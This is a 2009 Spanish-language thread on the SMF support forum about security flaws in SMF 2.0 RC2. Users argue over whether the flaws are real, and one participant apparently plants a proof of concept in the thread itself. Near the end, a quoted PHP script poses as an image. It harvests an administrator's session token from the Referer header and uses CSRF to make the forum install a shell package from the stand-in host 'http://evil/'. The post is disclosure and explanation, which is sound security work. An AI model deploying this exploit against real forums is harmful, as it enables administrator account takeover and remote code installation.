News:

SMF 2.1.4 has been released! Take it for a spin! Read more.

Main Menu

Bug del Smf 2.0 Rc2 Ayuda ! =S

Started by ZonaHacking, December 01, 2009, 12:45:01 PM

Previous topic - Next topic

ZonaHacking

Vulnerabilidades encontradas
45

Backdoors encontrados
1


Lo vi en una Pagina que icieron una investigacion de el Smf 2.0 Rc2 y aora mi pregunta es... Como las puedo tapar? o para cuando sera tapadas? para intalar, esa intalacion y no tener esas vulnerables ni backdoors... de esa forma las webs podria ser muy faciles de defacear =S.



ZonaHacking


Lessiem Taralom

OMG!!!  :o
Que van a hacer con esto??, en serio ya.........

Pedi que me borren

No es la primera vez que se descubre algo que no se puede probar.
Menos cuando miras al pie del sitio donde esta escrito:
Powered by SMF 1.1.10 | SMF © 2006-2008, Simple Machines LLC 

El peor bugs que tiene smf, son losmalos administradores y contra es, no hay parche posible.

ZonaHacking

Nose me dieron penasr que quizas no lo pone por ese motivo que tiene tantas vulnerabilidades y eso... halli ponen " pruebas "  ... asin como imagenes y eso...


Tonces... se podria estar trankilo?

Pedi que me borren

#7
Si en un foro mostraran un bug sobre la vulnerabilidad de Smf,  y usaran, por ejemplo PhpBB...bueno...me detendria a leerlo.
Pero si el descubrimiento lo hacen sobre este mismo soft...es como que me tientan a probarlo con el mismo sitio que lo comenta...

Usa Smf tranquilo...

petazeta

#8
QuoteNo es la primera vez que se descubre algo que no se puede probar.
Te creo si no se pudieran comprobar pero ya se publcaron y todas están con su prueba de concepto y algunas con sus respectivos parches.
Algunos tambien afectaban a smf 1.1.10 pero ya se repararon en la version 1.1.11.

QuoteMenos cuando miras al pie del sitio donde esta escrito:
Powered by SMF 1.1.10 | SMF © 2006-2008, Simple Machines LLC

El peor bugs que tiene smf, son losmalos administradores y contra es, no hay parche posible.
Los bugs a medida que se han ido descubriendo se han ido parchando al instante, no porque tenga una version antigua significa que aun es vulnerable. Es como decir que en la casa del panadero no hay harina.

Se nota que no conoces mucho sobre seguridad.

QuoteLo vi en una Pagina que icieron una investigacion de el Smf 2.0 Rc2 y aora mi pregunta es... Como las puedo tapar? o para cuando sera tapadas? para intalar, esa intalacion y no tener esas vulnerables ni backdoors... de esa forma las webs podria ser muy faciles de defacear =S.
Claramente en la descarga de smf 2.0 rc2 se recomienda que su utilización no sea en sitios webs delicados ya que es una version beta aun no terminada, nadie con dos dedos de frente debería utilizarla para sitios finalizados, para eso está la version 1.1.11.

Los bugs se publicaron en el mismo enlace que alguien puso mas arriba.

YST

#9



Salu2

PD: Abrir con firefox =D


YST

Intenta modificar mi segundo post y lo sabras  ::)


YST

Era para que supieras que pasa  ;D

Esta es la imagen :P
hxxp:foro.elhacker.net/nivel_web/auditoria_de_seguridad_hacia_simple_machines_forum_20-t271199.0.html;msg1358099#msg1358099 [nonactive]

Salu2 :D

petazeta

yst deja de tocar las pelotas xD los desarrolladores ya saben de estos dos bugs.

Pedi que me borren

Ahi esta editado de nuevo.

Un usuario nuevo no debe poder subir archivos por attach.

El abuso viene, porque este es un foro de soporte donde se puede dar la libertad de hacerlo en beneficio de los usuarios ccn problemas.

O sea que eso, mas que bug es un abuso.

YST

#16
@Pedi que me borren : En el primer post no pasa nada si lo editas ;) . Los unicos bugs graves no son los de inyección SQL , existen bugs como inyección de codigo PHP en SMF que lo descubrio WHK ;)

@Pendejo: El mensaje demuestra un XSS yo puse un mensaje pero otro te puede robar la coockie entre otras cosas  ;)

@petazeta : No es por molestar de hecho nunca me ah gustado molestar pero que un usuario cualquiera hable esas estupideces pasa pero que un moderador lo haga da enojo ;)


sirdarckcat

QuoteEl tema es simple, ¿se pueden inyectar datos a la Base de Datos?, si la respuesta es SI, entonces estamos en problemas, si la respuesta es NO, no pasa nada.
SI

QuoteLo digo porque durante AÑOS usé PHPNuke que es una hyper-coladera y JAMÁS tuve una intrusión de ningún tipo
que te hayas dado cuenta.. ;)

QuoteY eso de mostrar mensajitos emergentes es una reverenda pavada, no tiene un "catso" que ver con seguridad.
jajajajaja es una prueba de concepto, te invito te pases por hxxp:xssed.org/ [nonactive] y veas cuantas "reverendas pavadas" hay en todos lados =D.

QuoteModestia aparte, creo tener algo de idea de seguridad:
hxxp:nukecops.com/article4524.html [nonactive]
lol... felicidades encontraste un hoyo en una coladera jajajajajajajajajja

no iba a responder en este mensaje pero esque me dio mucha risa la respuesta de este  PeNdEjO

Saludos!!

Nibogo

Quote from: YST on December 02, 2009, 09:37:26 PM
@Pedi que me borren : En el primer post no pasa nada si lo editas ;) . Los unicos bugs graves no son los de inyección SQL , existen bugs como inyección de codigo PHP en SMF que lo descubrio WHK ;)

@Pendejo: El mensaje demuestra un XSS yo puse un mensaje pero otro te puede robar la coockie entre otras cosas  ;)

@petazeta : No es por molestar de hecho nunca me ah gustado molestar pero que un usuario cualquiera hable esas estupideces pasa pero que un moderador lo haga da enojo ;)

Da enojo? Sabe la cantidad de gente que postea sencillamente estupideces en los foros?? Sabe la cantidad de gente que reporta vulnberabilidades falsas? Sabe la cantidad de gente que se la pasa haciendo comentarios solo x eso, x comentar??

Yo no me voy a poner a leer cuanto articulo ponen, mucho menos ponerme a editar mensajes mostrar una imagen pendeja en un foro como estos

A decir verdad algo que ya esta siendo evaluado x el team de SM.org pero la vdad no creo que vaya a pasar a mayores

WHK

Hola NIBOGO,
Primero que nada disculpa por la actitud de YST.

Y quería comentar sobre tu post:
QuoteSabe la cantidad de gente que reporta vulnberabilidades falsas?
No son falsas

Quotemucho menos ponerme a editar mensajes mostrar una imagen pendeja en un foro como estos
La imagen que YST mostró es parte de una vulnerabilidad en todas las versiones de SMFla cual consiste en mostrar una imagen y luego cuanto tu citas un mensaje que está dentro de la misma página del post o intentas modificarlo lo que haces es dejar tu token de seguridad en el navegador que te protege contra ataques de tipo CSRF.
Esa imagen que ves no es una imagen en si sino un script hecho en php que verifica si la referencia contiene tu token de seguridad, si lo citas o lo intentas modificar ese script altera tu perfil de usuario de forma arbitraria.
Con un CSRF incluyendo tu token de seguridad el atacante puede hacer practicamente de todo en el foro donde estas incluyendo tener acceso a los sitios restringidos que normalmente tienen los moderadores y grupos especiales de usuarios.
http://foro.elhacker.net/nivel_web/auditoria_de_seguridad_hacia_simple_machines_forum_20-t271199.0.html;msg1358099#msg1358099

Te cito el exploit que YST puso al que tu le llamas imagen:
Code (php) Select
<?php
 
/* Evitamos un error inesperado */
error_reporting(0);
 
/* Imagen a visualizar */
$imagen_carnada 'http://t2.gstatic.com/images?q=tbn:MBl2gp1VvxRl2M:http://rufadas.com/wp-content/uploads/2007/04/cara-de-culo.jpg';
$servidor_shell 'http://evil/';
$mod_shell 'shell_mod.zip';
 
$referer $_SERVER['HTTP_REFERER'];
$referer explode(';'$referer);
/* Token formado por un hash de 32 carácteres
mas un nombre de variable al azar */
foreach($referer as $token){
 
$token explode('='$token);
 if(
strlen($token[0]) > 6){
  if(
strlen($token[1]) == 32){
   
$url_foro $_SERVER['HTTP_REFERER'];
   
$url_foro explode('index.php'$url_foro);
   
$url_foro $url_foro[0];
   
/* Apostamos a un CSRF apuntando al panel de administración */
   
header(
    
'location: '.$url_foro.'index.php?action=admin;'.
    
'area=packages;get;sa=download;byurl;package='.
    
urlencode($servidor_shell).';filename='.urlencode($mod_shell).';'.
    
$token[0].'='.$token[1]);
   exit;
  }
 }
}
 
/* No hay token */
header('Content-Type: image/jpeg');
echo 
file_get_contents($imagen_carnada);
exit;
?>


De todas formas esta prueba de concepto solo apunta a una instalación arbitraria de paquetes en la sección de administración pero puedes reemplazarla por cualquier acción arbitraria que desees ya que al fin y al cabo tienen tu token de seguridad que protegía tu cuenta.

Pero como ya dijeron, el equipo de simplemachines ya está al tanto de esta falla de seguridad y me extraña que no se haya reparado en la versión 1.1.11, ojala si incluyan el parche en la próxima versión al igual que en la 2.0.

Saludos y disculpa por lo de YST.

Advertisement: